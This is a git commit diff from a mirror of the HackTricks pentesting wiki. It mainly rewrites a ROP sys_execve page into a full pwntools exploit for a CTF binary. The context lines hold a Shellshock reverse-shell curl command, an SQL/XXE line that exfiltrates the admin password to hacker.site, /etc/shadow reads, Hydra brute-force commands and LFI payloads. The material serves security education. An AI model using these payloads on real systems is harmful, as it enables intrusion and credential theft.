mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [master] 19 pages and 4 assets modified
This commit is contained in:
parent
c59e78e9c2
commit
9d85603d35
21 changed files with 219 additions and 78 deletions
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
Before Width: | Height: | Size: 740 KiB After Width: | Height: | Size: 740 KiB |
|
@ -514,7 +514,7 @@
|
|||
|
||||
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
|
||||
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
|
||||
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
|
||||
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
|
||||
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
|
||||
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
|
||||
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
|
||||
|
|
|
@ -27,12 +27,6 @@ Heap**
|
|||
|
||||
**Stack**
|
||||
|
||||
## **1.STACK OVERFLOWS**
|
||||
|
||||
> buffer overflow, buffer overrun, stack overrun, stack smashing
|
||||
|
||||
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
|
||||
|
||||
**Sección BSS**: Variables globales o estáticas sin inicializar
|
||||
|
||||
```text
|
||||
|
@ -51,19 +45,27 @@ int i = 5;
|
|||
|
||||
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
|
||||
|
||||
## **1.STACK OVERFLOWS**
|
||||
|
||||
> buffer overflow, buffer overrun, stack overrun, stack smashing
|
||||
|
||||
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
|
||||
|
||||
\*\*\*\*
|
||||
|
||||
Para obtener la dirección de una función dentro de un programa se puede hacer:
|
||||
|
||||
```text
|
||||
objdump -d ./PROGRAMA | grep FUNCION
|
||||
```
|
||||
|
||||
Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
|
||||
|
||||
* `unset env LINES`
|
||||
* `unset env COLUMNS`
|
||||
* `set env _=path` donde path es la ruta absoluta al programa
|
||||
* explotar el programa usando la ruta absoluta
|
||||
* asegúrate de que PWD y OLDPWD son las mismas que en gdb
|
||||
|
||||
## ROP
|
||||
|
||||
### Call to sys\_execve
|
||||
|
||||
{% page-ref page="rop-syscall-execv.md" %}
|
||||
|
||||
## **2.SHELLCODE**
|
||||
|
||||
|
|
|
@ -1,51 +1,164 @@
|
|||
# ROP - Syscall execv
|
||||
# ROP - call sys\_execve
|
||||
|
||||
The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
|
||||
In order to prepare the call for the **syscall** it's needed the following configuration:
|
||||
|
||||
* **RDI**: Pointing to the string "/bin/bash"
|
||||
* **RSI**: Null
|
||||
* **RDX**: Null
|
||||
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
|
||||
* `rax: 59 Specify sys_execve`
|
||||
* `rdi: ptr to "/bin/sh" specify file to execute`
|
||||
* `rsi: 0 specify no arguments passed`
|
||||
* `rdx: 0 specify no environment variables passed`
|
||||
|
||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
|
||||
|
||||
## Control the registers
|
||||
|
||||
Let's start by finding **how to control those registers**:
|
||||
|
||||
```c
|
||||
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
|
||||
0x0000000000415664 : pop rax ; ret
|
||||
0x0000000000400686 : pop rdi ; ret
|
||||
0x00000000004101f3 : pop rsi ; ret
|
||||
0x00000000004498b5 : pop rdx ; ret
|
||||
```
|
||||
|
||||
With these addresses it's possible to **write the content in the stack and load it into the registers**.
|
||||
|
||||
## Write string
|
||||
|
||||
### Writable memory
|
||||
|
||||
Frist you need to find a writable place in the memory
|
||||
|
||||
```bash
|
||||
ROPgadget --binary vulnbinary | grep syscall
|
||||
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
|
||||
gef> vmmap
|
||||
[ Legend: Code | Heap | Stack ]
|
||||
Start End Offset Perm Path
|
||||
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
|
||||
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
|
||||
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
|
||||
```
|
||||
|
||||
## Writing
|
||||
### Write String
|
||||
|
||||
If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
|
||||
Then you need to find a way to write arbitrary content in this address
|
||||
|
||||
Elsewhere, you may search for some **write-what-where**.
|
||||
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
|
||||
|
||||
You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
|
||||
|
||||
### Finding a place to write
|
||||
|
||||
If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
|
||||
|
||||
```bash
|
||||
objdump -x vulnbinary | grep ".bss" -B1
|
||||
CONTENTS, ALLOC, LOAD, DATA
|
||||
23 .bss 00000010 00403418 00403418 00002418 2**3
|
||||
```python
|
||||
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
|
||||
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
|
||||
```
|
||||
|
||||
In this case: **0x403418**
|
||||
#### 32 bits
|
||||
|
||||
### **Writing** _**"/bin/sh"**_
|
||||
```python
|
||||
'''
|
||||
Lets write "/bin/sh" to 0x6b6000
|
||||
|
||||
```text
|
||||
buffer += address(pop_eax) # place value into EAX
|
||||
buffer += "/bin" # 4 bytes at a time
|
||||
buffer += address(pop_edx) # place value into edx
|
||||
buffer += address(writable_memory)
|
||||
buffer += address(writewhatwhere)
|
||||
pop rdx, 0x2f62696e2f736800
|
||||
pop rax, 0x6b6000
|
||||
mov qword ptr [rax], rdx
|
||||
'''
|
||||
|
||||
buffer += address(pop_eax)
|
||||
buffer += "//sh"
|
||||
buffer += address(pop_edx)
|
||||
buffer += address(writable_memory + 4)
|
||||
buffer += address(writewhatwhere)
|
||||
rop += popRdx # place value into EAX
|
||||
rop += "/bin" # 4 bytes at a time
|
||||
rop += popRax # place value into edx
|
||||
rop += p32(0x6b6000) # Writable memory
|
||||
rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||
|
||||
rop += popRdx
|
||||
rop += "//sh"
|
||||
rop += popRax
|
||||
rop += p32(0x6b6000 + 4)
|
||||
rop += writeGadget
|
||||
```
|
||||
|
||||
#### 64 bits
|
||||
|
||||
```python
|
||||
'''
|
||||
Lets write "/bin/sh" to 0x6b6000
|
||||
|
||||
pop rdx, 0x2f62696e2f736800
|
||||
pop rax, 0x6b6000
|
||||
mov qword ptr [rax], rdx
|
||||
'''
|
||||
rop = ''
|
||||
rop += popRdx
|
||||
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
|
||||
rop += popRax
|
||||
rop += p64(0x6b6000) # Writable memory
|
||||
rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||
```
|
||||
|
||||
## Example
|
||||
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
target = process('./speedrun-001')
|
||||
#gdb.attach(target, gdbscript = 'b *0x400bad')
|
||||
|
||||
# Establish our ROP Gadgets
|
||||
popRax = p64(0x415664)
|
||||
popRdi = p64(0x400686)
|
||||
popRsi = p64(0x4101f3)
|
||||
popRdx = p64(0x4498b5)
|
||||
|
||||
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
|
||||
writeGadget = p64(0x48d251)
|
||||
|
||||
# Our syscall gadget
|
||||
syscall = p64(0x40129c)
|
||||
|
||||
'''
|
||||
Here is the assembly equivalent for these blocks
|
||||
write "/bin/sh" to 0x6b6000
|
||||
|
||||
pop rdx, 0x2f62696e2f736800
|
||||
pop rax, 0x6b6000
|
||||
mov qword ptr [rax], rdx
|
||||
'''
|
||||
rop = ''
|
||||
rop += popRdx
|
||||
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
|
||||
rop += popRax
|
||||
rop += p64(0x6b6000)
|
||||
rop += writeGadget
|
||||
|
||||
'''
|
||||
Prep the four registers with their arguments, and make the syscall
|
||||
|
||||
pop rax, 0x3b
|
||||
pop rdi, 0x6b6000
|
||||
pop rsi, 0x0
|
||||
pop rdx, 0x0
|
||||
|
||||
syscall
|
||||
'''
|
||||
|
||||
rop += popRax
|
||||
rop += p64(0x3b)
|
||||
|
||||
rop += popRdi
|
||||
rop += p64(0x6b6000)
|
||||
|
||||
rop += popRsi
|
||||
rop += p64(0)
|
||||
rop += popRdx
|
||||
rop += p64(0)
|
||||
|
||||
rop += syscall
|
||||
|
||||
|
||||
# Add the padding to the saved return address
|
||||
payload = "0"*0x408 + rop
|
||||
|
||||
# Send the payload, drop to an interactive shell to use our new shell
|
||||
target.sendline(payload)
|
||||
|
||||
target.interactive()
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
|
||||
|
||||
|
|
|
@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
|
|||
apt-get install gdb
|
||||
```
|
||||
|
||||
### Parameters:
|
||||
### Parameters
|
||||
|
||||
**-q** --> No show banner
|
||||
**-x <file>** --> Auto-execute GDB instructions from here
|
||||
|
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
|
|||
pattern search $rsp #Search the offset given the content of $rsp
|
||||
```
|
||||
|
||||
### Tricks
|
||||
|
||||
#### GDB same addresses
|
||||
|
||||
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
|
||||
|
||||
* `unset env LINES`
|
||||
* `unset env COLUMNS`
|
||||
* `set env _=<path>` _Put the absolute path to the binary_
|
||||
* Exploit the binary using the same absolute route
|
||||
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
|
||||
|
||||
#### Backtrace to find functions called
|
||||
|
||||
When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
|
||||
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
|
||||
|
||||
```text
|
||||
gef➤ bt
|
||||
#0 0x00000000004498ae in ?? ()
|
||||
#1 0x0000000000400b90 in ?? ()
|
||||
#2 0x0000000000400c1d in ?? ()
|
||||
#3 0x00000000004011a9 in ?? ()
|
||||
#4 0x0000000000400a5a in ?? ()
|
||||
```
|
||||
|
||||
### GDB server
|
||||
|
||||
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)
|
||||
|
|
|
@ -744,7 +744,7 @@ And in order to read a file you could do:
|
|||
print(open("/etc/shadow", "r").read())
|
||||
```
|
||||
|
||||
#### Example with _\*\*_Environment \(Docker breakout\)
|
||||
#### Example with \_\*\*\_Environment \(Docker breakout\)
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
|
|||
```
|
||||
|
||||
Or with the **`ruby`** binary having this capability:
|
||||
|
||||
```bash
|
||||
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
|
||||
```
|
||||
|
|
|
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate \(from APNS\)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
|
||||
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
|
||||
|
||||
Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
|
||||
Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
|
||||
|
||||
## Main Applications
|
||||
|
||||
|
@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox=’ allow-scripts allow-to
|
|||
|
||||
### <meta abuse
|
||||
|
||||
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
|
||||
|
||||
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
|
||||
|
||||
This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
|
||||
|
||||
|
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
|
|||
|
||||
## Brute-Force Detection List
|
||||
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
|
||||
|
||||
## References
|
||||
|
||||
All the techniques presented here and more can view reviewed with more details in:
|
||||
|
||||
{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
|
||||
{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
|
||||
|
||||
Another HTML tags that can be abused can be find here:
|
||||
|
||||
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
|
||||
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
|
||||
|
||||
More info:
|
||||
|
||||
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
|
||||
|
||||
|
||||
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}
|
||||
|
||||
|
|
|
@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
|
|||
|
||||
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
|
||||
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
|
||||
|
||||
Try also to change `/` for `\`
|
||||
Try also to add `../../../../../`
|
||||
|
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
|
|||
|
||||
Merging several lists I have created:
|
||||
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
|
||||
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
|
||||
|
||||
Try also to change `/` for `\`
|
||||
Try also to remove `C:/` and add `../../../../../`
|
||||
|
@ -53,7 +53,7 @@ Check the LFI list of linux.
|
|||
|
||||
## Basic LFI and bypasses
|
||||
|
||||
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
|
||||
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
|
||||
|
||||
```text
|
||||
http://example.com/index.php?page=../../../etc/passwd
|
||||
|
@ -330,7 +330,7 @@ Other possible log paths:
|
|||
/var/log/httpd/error_log
|
||||
```
|
||||
|
||||
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
|
||||
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
|
||||
|
||||
### Via Email
|
||||
|
||||
|
|
|
@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
|
|||
```
|
||||
|
||||
### Out of band data exfiltration via XXE
|
||||
|
||||
```sql
|
||||
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
|
||||
```
|
||||
|
|
|
@ -265,7 +265,7 @@ Entry_1:
|
|||
print(s.run_ps('ipconfig'))
|
||||
|
||||
https://book.hacktricks.xyz/pentesting/pentesting-winrm
|
||||
|
||||
|
||||
Entry_2:
|
||||
Name: Hydra Brute Force
|
||||
Desctiption: Need User
|
||||
|
|
|
@ -225,7 +225,7 @@ Entry_5:
|
|||
Name: Browser Connection
|
||||
Description: Connect with Browser
|
||||
Note: ftp://anonymous:anonymous@{IP}
|
||||
|
||||
|
||||
Entry_6:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need Username
|
||||
|
|
|
@ -374,10 +374,10 @@ Entry_5:
|
|||
Name: LdapSearch Big Dump
|
||||
Description: Need Naming Context to do big dump
|
||||
Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
|
||||
|
||||
|
||||
Entry_6:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need User
|
||||
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
|
||||
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
|
||||
```
|
||||
|
||||
|
|
|
@ -111,7 +111,7 @@ Entry_4:
|
|||
Name: Nmap
|
||||
Description: Scan for POP info
|
||||
Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}
|
||||
|
||||
|
||||
Entry_5:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need User
|
||||
|
|
|
@ -499,7 +499,7 @@ Entry_4:
|
|||
Name: Nmap Smb Scan 2
|
||||
Description: SMB Vuln Scan With Nmap (Less Specific)
|
||||
Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
|
||||
|
||||
|
||||
Entry_5:
|
||||
Name: Hydra Brute Force
|
||||
Desctiption: Need User
|
||||
|
|
|
@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
|
|||
|
||||
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
|
||||
|
||||
```
|
||||
```text
|
||||
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
|
||||
EHLO all
|
||||
250-somedomain.com Hello [x.x.x.x]
|
||||
|
@ -507,7 +507,7 @@ Entry_6:
|
|||
Name: Find MX Servers
|
||||
Description: Find MX servers of an organization
|
||||
Command: dig +short mx {Domain_Name}
|
||||
|
||||
|
||||
Entry_7:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need Nothing
|
||||
|
|
|
@ -210,7 +210,7 @@ Entry_4:
|
|||
Name: Nmap
|
||||
Description: Nmap snmp (no brute)
|
||||
Command: nmap --script "snmp* and not snmp-brute" {IP}
|
||||
|
||||
|
||||
Entry_5:
|
||||
Name: Hydra Brute Force
|
||||
Description: Need Nothing
|
||||
|
|
|
@ -287,3 +287,4 @@ Entry_1:
|
|||
Description: Need Username
|
||||
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
|
||||
```
|
||||
|
||||
|
|
|
@ -373,7 +373,7 @@ Entry_10:
|
|||
Command: |
|
||||
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
|
||||
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
|
||||
|
||||
|
||||
Entry_11:
|
||||
Name: WordPress Hydra Brute Force
|
||||
Description: Need User (admin is default)
|
||||
|
|
|
@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
|
|||
|
||||
You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
|
||||
|
||||
#### **Test**
|
||||
### **Test**
|
||||
|
||||
Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
|
||||
|
||||
|
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
|
|||
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
|
||||
```
|
||||
|
||||
#### **Curl \(reflected, blind and out-of-band\)**
|
||||
### **Curl \(reflected, blind and out-of-band\)**
|
||||
|
||||
```bash
|
||||
# Reflected
|
||||
|
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
|
|||
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
|
||||
```
|
||||
|
||||
#### Exploit
|
||||
### Exploit
|
||||
|
||||
```bash
|
||||
#Bind Shell
|
||||
|
|
Loading…
Reference in a new issue